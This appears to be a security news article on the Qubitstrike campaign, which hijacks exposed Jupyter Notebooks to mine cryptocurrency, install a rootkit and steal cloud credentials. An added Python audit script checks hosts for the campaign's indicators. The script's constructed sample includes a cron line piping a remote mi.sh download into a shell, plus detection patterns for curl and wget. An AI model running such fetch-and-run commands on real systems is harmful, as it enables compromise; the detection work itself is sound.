    Jupyter Notebooks Under Attack: Qubitstrike Launches Crypto Mining and Rootkit Campaign

    A threat actor, possibly based in Tunisia, has been linked to a new campaign that targets exposed Jupyter Notebooks for cryptocurrency mining and cloud breaches.

    The campaign, tracked as Qubitstrike by Cado Security, uses the Telegram API to exfiltrate cloud service provider credentials after a successful compromise.

    Security researchers Matt Muir and Nate Bill explain that all the campaign’s payloads are hosted on codeberg.org, an alternative Git hosting platform similar to GitHub.

    In this attack chain, publicly accessible Jupyter instances are breached to execute commands and retrieve a shell script (mi.sh) hosted on Codeberg.

    The shell script, the primary payload, does the following:

    • Executes a cryptocurrency miner
    • Establishes persistence with a cron job
    • Inserts an attacker-controlled key into the .ssh/authorized_keys file for remote access
    • Propagates the malware to other hosts via SSH.

    The malware can also retrieve and install the Diamorphine rootkit to hide malicious processes and transmit captured Amazon Web Services (AWS) and Google Cloud credentials back to the attacker through the Telegram bot API.

    Notably, the attackers rename legitimate data transfer utilities like curl and wget to evade detection.

    The shell script also iterates through a hardcoded list of process names, attempting to kill associated processes, hindering competitor mining operations.

    Furthermore, it uses the netstat command together with a hard-coded list of IP/port pairs to kill existing network connections to specific IP addresses, and it deletes various Linux log files, indicating an attempt to stay unnoticed.
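    A host-side audit for the indicators described above (unknown SSH keys in authorized_keys, cron entries that fetch remote content, and renamed or missing curl/wget), added here as an example and not code from the original article or from Cado's report; the functions take file contents as text so they can run over copies pulled from a host, and the samples at the bottom are constructed.

```python
"""Audit a Linux host for the Qubitstrike-style indicators described above.

Added example: the functions take file contents as text so they can be run
against copies pulled from a host; the samples at the bottom are constructed.
"""
import re
import shutil

# Cron entries that fetch or run remote content (the mi.sh persistence pattern).
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b|https?://|codeberg\.org")
KEY_TYPES = ("ssh-", "ecdsa-", "sk-")


def unknown_authorized_keys(authorized_keys_text, allowlist):
    """Return authorized_keys lines whose key body is not in the allowlist of known keys."""
    findings = []
    for line in authorized_keys_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # Options (command=..., from=...) may precede the key type; find the type token.
        idx = next((i for i, f in enumerate(fields) if f.startswith(KEY_TYPES)), None)
        if idx is None or idx + 1 >= len(fields) or fields[idx + 1] not in allowlist:
            findings.append(line)  # unknown key, or a malformed line worth a look
    return findings


def suspicious_cron_lines(crontab_text):
    """Return cron entries that download or execute remote content."""
    return [
        line.strip()
        for line in crontab_text.splitlines()
        if line.strip() and not line.lstrip().startswith("#") and REMOTE_FETCH.search(line)
    ]


def missing_transfer_tools(names=("curl", "wget"), lookup=shutil.which):
    """Report transfer utilities absent from PATH; the article notes they get renamed."""
    return [name for name in names if lookup(name) is None]


if __name__ == "__main__":
    # Constructed samples standing in for files copied off a host.
    sample_keys = (
        "ssh-ed25519 AAAAC3KnownAdminKey admin@workstation\n"
        'command="/bin/sh" ssh-rsa AAAAB3UnknownKey root@unknown\n'
    )
    sample_cron = (
        "0 2 * * * /usr/local/bin/rotate-logs.sh\n"
        "*/5 * * * * curl -fsSL https://example.invalid/mi.sh | sh\n"
    )
    print(unknown_authorized_keys(sample_keys, {"AAAAC3KnownAdminKey"}))
    print(suspicious_cron_lines(sample_cron))
    print(missing_transfer_tools(lookup=lambda n: None if n == "wget" else "/usr/bin/" + n))
```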

    The exact origin of the threat actor remains unclear, but the evidence points to Tunisia, based on the IP address used to log in to a cloud honeypot with the stolen credentials.

    A closer look at the Codeberg repository reveals a Python implant (kdfs.py) designed for execution on infected hosts. It uses Discord as a command-and-control (C2) mechanism for uploading and downloading files.

    The connection between mi.sh and kdfs.py is unclear, but it is suspected that the Python backdoor helps deploy the shell script. mi.sh can also function as standalone malware without relying on kdfs.py.

    In summary, Qubitstrike is a sophisticated malware campaign focused on exploiting cloud services. While its primary objective appears to be mining cryptocurrency with XMRig, analysis of the Discord C2 infrastructure suggests that the operators could carry out various other attacks once they gain access to vulnerable hosts.